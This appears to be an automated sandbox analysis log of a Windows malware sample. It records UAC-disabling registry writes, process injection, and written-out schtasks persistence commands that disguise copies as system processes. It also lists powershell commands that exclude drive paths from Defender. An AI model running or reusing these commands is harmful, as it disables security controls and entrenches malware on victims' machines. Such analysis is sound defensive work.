N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2380 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 932 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 764 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 764 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 764 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 664 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 664 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 664 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2028 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2028 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2028 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2236 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2236 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2236 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 844 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 844 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 844 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 940 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 940 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 940 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1860 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1860 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1860 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1560 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\cmd.exe
PID 2380 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\cmd.exe
PID 2380 wrote to memory of 1792 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\cmd.exe
PID 1792 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1792 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1792 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1792 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 2612 wrote to memory of 1956 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1956 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1956 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1916 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1916 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2612 wrote to memory of 1916 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 1956 wrote to memory of 2180 N/A C:\Windows\System32\WScript.exe C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe
PID 2180 wrote to memory of 1740 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1740 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1740 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1576 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1576 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe
PID 2180 wrote to memory of 1576 N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Downloads\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default\Downloads\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Downloads\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Google\Update\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\Update\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Windows\LiveKernelReports\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Admin\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\ShellNew\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\ShellNew\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\ShellNew\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Windows\debug\WIA\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\debug\WIA\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Windows\debug\WIA\smss.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

